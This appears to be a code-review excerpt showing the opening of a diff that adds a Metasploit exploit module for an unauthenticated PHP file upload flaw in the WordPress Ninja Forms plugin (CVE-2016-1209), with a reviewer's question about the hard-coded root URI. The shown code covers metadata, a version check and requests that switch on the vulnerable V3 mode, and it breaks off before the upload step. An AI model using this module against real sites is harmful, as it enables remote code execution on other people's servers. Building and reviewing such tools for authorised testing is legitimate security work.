modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Ninja Forms Unauthenticated File Upload',
+      'Description'     => %(
+                              Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain
+                              an unauthenticated file upload vulnerability, allowing guests
+                              to uplod arbitrary PHP code that can be executed in the context
+                              of the web server.
+                            ),
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'James Golovich',                 # Discovery and disclosure
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['CVE', '2016-1209'],
+          ['WPVDB', '8485'],
+          ['URL', 'http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities']
+        ],
+      'DisclosureDate'  => 'May 04 2016',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['ninja-forms', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    opts = [OptString.new('FORM_PATH', [true, 'The relative path of the page that hosts any form served by Ninja Forms'])]
+    register_options(opts, self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('ninja-forms', '2.9.43', '2.9.36')
+  end
+
+  def enable_v3_functionality
+    print_status 'Enabling vulnerable V3 functionality...'
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => '/',
+      'vars_get'  => { 'nf-switcher' => 'upgrade' }
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::Unreachable, 'Failed to enable the vulnerable V3 functionality')
+    end
+
+    vprint_good 'Enabled V3 functionality'
+  end
+
+  def disable_v3_functionality
+    print_status 'Disabling vulnerable V3 functionality...'
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => '/',
```

Comment:
I'm not sure this makes sense? Is this a wordpress feature? What if I install wordpress in a different directory? Will this request still work?